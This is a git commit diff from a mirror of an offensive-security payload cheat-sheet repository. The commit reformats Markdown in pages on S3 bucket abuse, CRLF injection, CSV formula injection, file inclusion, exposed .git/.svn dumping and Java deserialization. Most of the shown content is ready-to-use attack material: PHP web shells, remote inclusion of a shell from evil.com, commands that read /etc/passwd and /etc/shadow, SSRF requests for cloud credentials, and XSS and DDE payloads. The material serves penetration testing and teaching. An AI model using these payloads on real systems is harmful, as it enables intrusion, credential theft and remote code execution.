mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Markdown formatting update
This commit is contained in:
parent
177c12cb79
commit
65654f81a4
@ -1,47 +1,56 @@
|
||||
# Amazon Bucket S3 AWS
|
||||
|
||||
Prerequisites, at least you need awscli
|
||||
```
|
||||
|
||||
```bash
|
||||
sudo apt install awscli
|
||||
```
|
||||
|
||||
You can get your credential here https://console.aws.amazon.com/iam/home?#/security_credential
|
||||
but you need an aws account, free tier account : https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free_np/
|
||||
```
|
||||
|
||||
```javascript
|
||||
aws configure
|
||||
AWSAccessKeyId=[ENTER HERE YOUR KEY]
|
||||
AWSSecretKey=[ENTER HERE YOUR KEY]
|
||||
```
|
||||
```
|
||||
|
||||
```javascript
|
||||
aws configure --profile nameofprofile
|
||||
```
|
||||
|
||||
then you can use *--profile nameofprofile* in the aws command
|
||||
|
||||
By default the name of Amazon Bucket are like http://s3.amazonaws.com/[bucket_name]/, you can browse open buckets if you know their names
|
||||
```
|
||||
|
||||
```bash
|
||||
http://s3.amazonaws.com/[bucket_name]/
|
||||
http://[bucket_name].s3.amazonaws.com/
|
||||
http://flaws.cloud.s3.amazonaws.com/
|
||||
```
|
||||
|
||||
## Basic test - Listing the files
|
||||
|
||||
```bash
|
||||
aws s3 ls s3://targetbucket --no-sign-request --region insert-region-here
|
||||
aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2
|
||||
```
|
||||
|
||||
You can get the region with a dig and nslookup
|
||||
|
||||
```bash
|
||||
$ dig flaws.cloud
|
||||
;; ANSWER SECTION:
|
||||
flaws.cloud. 5 IN A 52.218.192.11
|
||||
flaws.cloud. 5 IN A 52.218.192.11
|
||||
|
||||
$ nslookup 52.218.192.11
|
||||
Non-authoritative answer:
|
||||
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
|
||||
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
|
||||
```
|
||||
|
||||
|
||||
## Move a file into the bucket
|
||||
```
|
||||
|
||||
```bash
|
||||
aws s3 mv test.txt s3://hackerone.marketing
|
||||
FAIL : "move failed: ./test.txt to s3://hackerone.marketing/test.txt A client error (AccessDenied) occurred when calling the PutObject operation: Access Denied."
|
||||
|
||||
@ -50,17 +59,20 @@ SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"
|
||||
```
|
||||
|
||||
## Download every things (in an open bucket)
|
||||
```
|
||||
|
||||
```powershell
|
||||
aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2
|
||||
```
|
||||
|
||||
## Check bucket disk size (authenticated) use, --no-sign for un-authenticated
|
||||
```
|
||||
|
||||
```powershell
|
||||
aws s3 ls s3://<bucketname> --recursive | grep -v -E "(Bucket: |Prefix: |LastWriteTime|^$|--)" | awk 'BEGIN {total=0}{total+=$3}END{print total/1024/1024" MB"}'
|
||||
```
|
||||
|
||||
## AWS - Extract Backup
|
||||
```
|
||||
|
||||
```powershell
|
||||
aws --profile flaws sts get-caller-identity
|
||||
"Account": "XXXX26262029",
|
||||
|
||||
@ -79,19 +91,23 @@ sudo file -s /dev/xvda1
|
||||
sudo mount /dev/xvda1 /mnt
|
||||
```
|
||||
|
||||
|
||||
## Bucket informations
|
||||
|
||||
Amazon exposes an internal service every EC2 instance can query for instance metadata about the host. If you found an SSRF vulnerability that runs on EC2, try requesting :
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://169.254.169.254/latest/meta-data/
|
||||
http://169.254.169.254/latest/user-data/
|
||||
http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE will return the AccessKeyID, SecretAccessKey, and Token
|
||||
```
|
||||
|
||||
For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
|
||||
|
||||
## Bucket Finder
|
||||
|
||||
A cool tool that will search for readable buckets and list all the files in them. It can also be used to quickly find buckets that exist but deny access to listing files.
|
||||
```
|
||||
|
||||
```powershell
|
||||
wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2
|
||||
./bucket_finder.rb my_words
|
||||
./bucket_finder.rb --region ie my_words
|
||||
@ -104,14 +120,16 @@ wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar
|
||||
./bucket_finder.rb --download --region ie my_words
|
||||
./bucket_finder.rb --log-file bucket.out my_words
|
||||
```
|
||||
|
||||
Use a custom wordlist for the bucket finder, can be created with
|
||||
```
|
||||
|
||||
```powershell
|
||||
List of Fortune1000 company names with permutations on .com, -backup, -media. For example, walmart becomes walmart, walmart.com, walmart-backup, walmart-media.
|
||||
List of the top Alexa 100,000 sites with permutations on the TLD and www. For example, walmart.com becomes www.walmart.com, www.walmart.net, walmart.com, and walmart.
|
||||
```
|
||||
|
||||
|
||||
## Thanks to
|
||||
|
||||
* https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets
|
||||
* https://digi.ninja/projects/bucket_finder.php
|
||||
* [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792)
|
||||
|
@ -1,16 +1,20 @@
|
||||
# CRLF
|
||||
|
||||
The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.
|
||||
|
||||
A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
|
||||
|
||||
## CRLF - Add a cookie
|
||||
|
||||
Requested page
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue
|
||||
```
|
||||
|
||||
HTTP Response
|
||||
```
|
||||
|
||||
```powershell
|
||||
Connection: keep-alive
|
||||
Content-Length: 178
|
||||
Content-Type: text/html
|
||||
@ -24,12 +28,16 @@ x-xss-protection: 1; mode=block
|
||||
```
|
||||
|
||||
## CRLF - Add a cookie - XSS Bypass
|
||||
|
||||
Requested page
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e
|
||||
```
|
||||
|
||||
HTTP Response
|
||||
```
|
||||
|
||||
```powershell
|
||||
HTTP/1.1 200 OK
|
||||
Date: Tue, 20 Dec 2016 14:34:03 GMT
|
||||
Content-Type: text/html; charset=utf-8
|
||||
@ -50,15 +58,17 @@ X-XSS-Protection:0
|
||||
0
|
||||
```
|
||||
|
||||
|
||||
## CRLF - Write HTML
|
||||
|
||||
Requested page
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
|
||||
```
|
||||
|
||||
HTTP response
|
||||
```
|
||||
|
||||
```powershell
|
||||
Set-Cookie:en
|
||||
Content-Length: 0
|
||||
|
||||
@ -71,19 +81,21 @@ Content-Length: 34
|
||||
```
|
||||
|
||||
## CRLF - Filter Bypass
|
||||
|
||||
Using UTF-8 encoding
|
||||
```
|
||||
|
||||
```powershell
|
||||
%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE
|
||||
```
|
||||
|
||||
Remainder:
|
||||
|
||||
* %E5%98%8A = %0A = \u560a
|
||||
* %E5%98%8D = %0D = \u560d
|
||||
* %E5%98%BE = %3E = \u563e (>)
|
||||
* %E5%98%BC = %3C = \u563c (<)
|
||||
|
||||
|
||||
|
||||
|
||||
## Thanks to
|
||||
|
||||
* https://www.owasp.org/index.php/CRLF_Injection
|
||||
* https://vulners.com/hackerone/H1:192749
|
||||
|
@ -1,22 +1,24 @@
|
||||
# CSV Excel formula injection
|
||||
|
||||
Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel,Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.
|
||||
|
||||
## Exploit
|
||||
|
||||
Basic exploit with Dynamic Data Exchange
|
||||
```
|
||||
|
||||
```powershell
|
||||
DDE ("cmd";"/C calc";"!A0")A0
|
||||
@SUM(1+1)*cmd|' /C calc'!A0
|
||||
```
|
||||
|
||||
Technical Details of the above payload:
|
||||
cmd is the name the server can respond to whenever a client is trying to access the server
|
||||
/C calc is the file name which in our case is the calc(i.e the calc.exe)
|
||||
!A0 is the item name that specifies unit of data that a server can respond when the client is requesting the data
|
||||
|
||||
```
|
||||
|
||||
Any formula can be started with
|
||||
```
|
||||
|
||||
```powershell
|
||||
=
|
||||
+
|
||||
–
|
||||
@ -24,6 +26,7 @@ Any formula can be started with
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
* https://owasp.org/index.php/CSV_Excel_Macro_Injection
|
||||
* https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection
|
||||
*https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/
|
||||
|
||||
* [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection)
|
||||
* [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection)
|
||||
* [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/)
|
@ -1,15 +1,17 @@
|
||||
# Local/Remote File Inclusion
|
||||
|
||||
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
|
||||
|
||||
## Summary
|
||||
|
||||
* [Basic LFI](#basic-lfi)
|
||||
* [Basic RFI](#basic-rfi)
|
||||
* [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
|
||||
* [Wrapper php://filter]()
|
||||
* [Wrapper zip://]()
|
||||
* [Wrapper data://]()
|
||||
* [Wrapper expect://]()
|
||||
* [Wrapper input://]()
|
||||
* [Wrapper php://filter](l#wrapper-phpfilter)
|
||||
* [Wrapper zip://](#wrapper-zip)
|
||||
* [Wrapper data://](#wrapper-data)
|
||||
* [Wrapper expect://](#wrapper-expect)
|
||||
* [Wrapper input://](#wrapper-input)
|
||||
* [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd)
|
||||
* [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron)
|
||||
* [LFI to RCE via upload](#lfi-to-rce-via-upload)
|
||||
@ -17,9 +19,9 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e
|
||||
* [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)
|
||||
* [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)
|
||||
|
||||
|
||||
Linux - Interesting files to check out :
|
||||
```
|
||||
|
||||
```powershell
|
||||
/etc/issue
|
||||
/etc/passwd
|
||||
/etc/shadow
|
||||
@ -40,7 +42,8 @@ Linux - Interesting files to check out :
|
||||
```
|
||||
|
||||
Windows - Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
|
||||
```
|
||||
|
||||
```powershell
|
||||
c:/boot.ini
|
||||
c:/inetpub/logs/logfiles
|
||||
c:/inetpub/wwwroot/global.asa
|
||||
@ -63,9 +66,9 @@ c:/unattended.txt
|
||||
c:/unattended.xml
|
||||
```
|
||||
|
||||
|
||||
The following log files are controllable and can be included with an evil payload to achieve a command execution
|
||||
```
|
||||
|
||||
```powershell
|
||||
/var/log/apache/access.log
|
||||
/var/log/apache/error.log
|
||||
/var/log/httpd/error_log
|
||||
@ -76,128 +79,146 @@ The following log files are controllable and can be included with an evil payloa
|
||||
/var/log/mail
|
||||
```
|
||||
|
||||
|
||||
## Basic LFI
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=../../../etc/passwd
|
||||
```
|
||||
|
||||
Null byte
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=../../../etc/passwd%00
|
||||
```
|
||||
|
||||
Double encoding
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
|
||||
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
|
||||
```
|
||||
|
||||
Path truncation
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
|
||||
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
|
||||
```
|
||||
|
||||
Filter bypass tricks
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=....//....//etc/passwd
|
||||
http://example.com/index.php?page=..///////..////..//////etc/passwd
|
||||
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
|
||||
```
|
||||
|
||||
## Basic RFI
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=http://evil.com/shell.txt
|
||||
```
|
||||
|
||||
Null byte
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=http://evil.com/shell.txt%00
|
||||
```
|
||||
|
||||
Double encoding
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
|
||||
```
|
||||
|
||||
## LFI / RFI using wrappers
|
||||
|
||||
### Wrapper php://filter
|
||||
|
||||
The part "php://filter" is case insensitive
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
|
||||
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
|
||||
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
|
||||
```
|
||||
|
||||
can be chained with a compression wrapper for large files.
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
|
||||
```
|
||||
|
||||
|
||||
### Wrapper zip://
|
||||
|
||||
```python
|
||||
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
|
||||
zip payload.zip payload.php;
|
||||
mv payload.zip shell.jpg;
|
||||
rm payload.php
|
||||
zip payload.zip payload.php;
|
||||
mv payload.zip shell.jpg;
|
||||
rm payload.php
|
||||
|
||||
http://example.com/index.php?page=zip://shell.jpg%23payload.php
|
||||
```
|
||||
|
||||
|
||||
### Wrapper data://
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
|
||||
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
|
||||
```
|
||||
|
||||
Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+`
|
||||
|
||||
|
||||
### Wrapper expect://
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=php:expect://id
|
||||
http://example.com/index.php?page=php:expect://ls
|
||||
```
|
||||
|
||||
### Wrapper input://
|
||||
|
||||
Specify your payload in the POST parameters
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=php://input
|
||||
POST DATA: <? system('id'); ?>
|
||||
```
|
||||
|
||||
## LFI to RCE via /proc/*/fd
|
||||
|
||||
1. Upload a lot of shells (for example : 100)
|
||||
2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD
|
||||
with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
|
||||
2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD, with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
|
||||
|
||||
## LFI to RCE via /proc/self/environ
|
||||
|
||||
Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file
|
||||
```
|
||||
|
||||
```powershell
|
||||
GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
|
||||
User-Agent: <?=phpinfo(); ?>
|
||||
```
|
||||
|
||||
|
||||
|
||||
## LFI to RCE via upload
|
||||
If you can upload a file, just inject the shell payload in it (e.g : "<?php system($_GET['c']); ?>" ).
|
||||
```
|
||||
|
||||
If you can upload a file, just inject the shell payload in it (e.g : `<?php system($_GET['c']); ?>` ).
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=path/to/uploaded/file.png
|
||||
```
|
||||
|
||||
In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf
|
||||
|
||||
## LFI to RCE via phpinfo()
|
||||
|
||||
https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
|
||||
Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py)
|
||||
|
||||
|
||||
## LFI to RCE via controlled log file
|
||||
|
||||
Just append your PHP code into the log file by doing a request to the service (Apache, SSH..) and include the log file.
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=/var/log/apache/access.log
|
||||
http://example.com/index.php?page=/var/log/apache/error.log
|
||||
http://example.com/index.php?page=/var/log/vsftpd.log
|
||||
@ -209,30 +230,38 @@ http://example.com/index.php?page=/usr/local/apache2/log/error_log
|
||||
```
|
||||
|
||||
## LFI to RCE via PHP sessions
|
||||
|
||||
Check if the website use PHP Session (PHPSESSID)
|
||||
```
|
||||
|
||||
```javascript
|
||||
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
|
||||
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
|
||||
```
|
||||
|
||||
In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] files
|
||||
```
|
||||
|
||||
```javascript
|
||||
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
|
||||
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
|
||||
```
|
||||
Set the cookie to <?php system('cat /etc/passwd');?>
|
||||
```
|
||||
|
||||
Set the cookie to `<?php system('cat /etc/passwd');?>`
|
||||
|
||||
```powershell
|
||||
login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
|
||||
```
|
||||
|
||||
Use the LFI to include the PHP session file
|
||||
```
|
||||
|
||||
```powershell
|
||||
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
|
||||
```
|
||||
|
||||
|
||||
## Thanks to
|
||||
|
||||
* [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
|
||||
* [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/)
|
||||
* [Turning LFI to RFI ](https://l.avala.mp/?p=241)
|
||||
* [Turning LFI to RFI](https://l.avala.mp/?p=241)
|
||||
* [Is PHP vulnerable and under what conditions?](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)
|
||||
* [Upgrade from LFI to RCE via PHP Sessions](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/)
|
||||
* [Local file inclusion tricks](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html)
|
||||
|
@ -1,62 +1,60 @@
|
||||
# GIT - Source management
|
||||
# Insecured source code management
|
||||
|
||||
## GIT - Source code management
|
||||
|
||||
### Github example with a .git
|
||||
|
||||
## Github example with a .git
|
||||
1. Check 403 error (Forbidden) for .git or even better : directory listing
|
||||
|
||||
2. Git saves all informations in log file .git/logs/HEAD (try 'head' too)
|
||||
```
|
||||
0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
|
||||
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial.
|
||||
26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000 commit: Whoops! Remove flag.
|
||||
6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000 commit: Prevent directory listing.
|
||||
```
|
||||
|
||||
```powershell
|
||||
0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
|
||||
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial.
|
||||
26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000 commit: Whoops! Remove flag.
|
||||
6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000 commit: Prevent directory listing.
|
||||
```
|
||||
3. Access to the commit based on the hash -> a directory name (first two signs from hash) and filename (rest of it).git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c,
|
||||
```
|
||||
# create a .git directory
|
||||
git init test
|
||||
cd test/.git
|
||||
```powershell
|
||||
# create a .git directory
|
||||
git init test
|
||||
cd test/.git
|
||||
|
||||
# download the file
|
||||
wget http://xxx.web.xxx.com/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
|
||||
mkdir .git/object/26
|
||||
mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
|
||||
|
||||
# display the content of the file
|
||||
git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
|
||||
tree 323240a3983045cdc0dec2e88c1358e7998f2e39
|
||||
parent 15ca375e54f056a576905b41a417b413c57df6eb
|
||||
author Michael <michael@easyctf.com> 1489390329 +0000
|
||||
committer Michael <michael@easyctf.com> 1489390329 +0000
|
||||
Initial.
|
||||
```
|
||||
# download the file
|
||||
wget http://xxx.web.xxx.com/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
|
||||
mkdir .git/object/26
|
||||
mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
|
||||
|
||||
# display the content of the file
|
||||
git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
|
||||
tree 323240a3983045cdc0dec2e88c1358e7998f2e39
|
||||
parent 15ca375e54f056a576905b41a417b413c57df6eb
|
||||
author Michael <michael@easyctf.com> 1489390329 +0000
|
||||
committer Michael <michael@easyctf.com> 1489390329 +0000
|
||||
Initial.
|
||||
```
|
||||
4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
|
||||
```
|
||||
wget http://xxx.web.xxx.com/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
|
||||
mkdir .git/object/32
|
||||
mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
|
||||
|
||||
git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
|
||||
040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css
|
||||
100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt
|
||||
040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts
|
||||
100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html
|
||||
040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js
|
||||
```
|
||||
```powershell
|
||||
wget http://xxx.web.xxx.com/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
|
||||
mkdir .git/object/32
|
||||
mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
|
||||
|
||||
git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
|
||||
040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css
|
||||
100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt
|
||||
040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts
|
||||
100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html
|
||||
040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js
|
||||
```
|
||||
5. Read the data (flag.txt)
|
||||
```
|
||||
wget http://xxx.web.xxx.com/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
|
||||
mkdir .git/object/cb
|
||||
mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
|
||||
git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
|
||||
```
|
||||
```powershell
|
||||
wget http://xxx.web.xxx.com/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
|
||||
mkdir .git/object/cb
|
||||
mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
|
||||
git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
|
||||
```
|
||||
|
||||
### Automatic way : diggit.py
|
||||
|
||||
|
||||
## Automatic way : diggit.py
|
||||
```
|
||||
```powershell
|
||||
./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
|
||||
./diggit.py -u http://webpage.com -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
|
||||
|
||||
@ -65,9 +63,10 @@ git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
|
||||
-o is a hash of particular Git object to download
|
||||
```
|
||||
|
||||
## Alternative way : rip-git
|
||||
```
|
||||
perl rip-git.pl -v -u "http://edge1.web.*****.com/.git/"
|
||||
### Alternative way : rip-git
|
||||
|
||||
```powershell
|
||||
perl rip-git.pl -v -u "http://edge1.web.*****.com/.git/"
|
||||
|
||||
git cat-file -p 07603070376d63d911f608120eb4b5489b507692
|
||||
tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
|
||||
@ -78,34 +77,32 @@ committer Michael <michael@easyctf.com> 1489389105 +0000
|
||||
git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
|
||||
```
|
||||
|
||||
## SVN - Source code management
|
||||
|
||||
### SVN example (Wordpress)
|
||||
|
||||
|
||||
# SVN - Source management
|
||||
## SVN example (Wordpress)
|
||||
```
|
||||
```powershell
|
||||
curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
|
||||
```
|
||||
|
||||
1. Download the svn database
|
||||
http://server/path_to_vulnerable_site/.svn/wc.db
|
||||
```
|
||||
INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
|
||||
```
|
||||
|
||||
1. Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db
|
||||
```powershell
|
||||
INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
|
||||
```
|
||||
2. Download interesting files
|
||||
remove \$sha1\$ prefix
|
||||
add .svn-base postfix
|
||||
use first two signs from hash as folder name inside pristine/ directory (94 in this case)
|
||||
create complete path, which will be: http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base
|
||||
* remove \$sha1\$ prefix
|
||||
* add .svn-base postfix
|
||||
* use first two signs from hash as folder name inside pristine/ directory (94 in this case)
|
||||
* create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
|
||||
|
||||
### Automatic way
|
||||
|
||||
## Automatic way -
|
||||
```
|
||||
```powershell
|
||||
git clone https://github.com/anantshri/svn-extractor.git
|
||||
python svn-extractor.py –url “url with .svn available”
|
||||
python svn-extractor.py –url "url with .svn available"
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
|
||||
* bl4de, https://github.com/bl4de/research/tree/master/hidden_directories_leaks
|
||||
* bl4de, https://github.com/bl4de/security-tools/tree/master/diggit
|
||||
|
@ -1,8 +1,10 @@
|
||||
# Java Deserialization
|
||||
|
||||
## Exploit
|
||||
|
||||
[ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
|
||||
```
|
||||
|
||||
```java
|
||||
java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
|
||||
java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
|
||||
java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin
|
||||
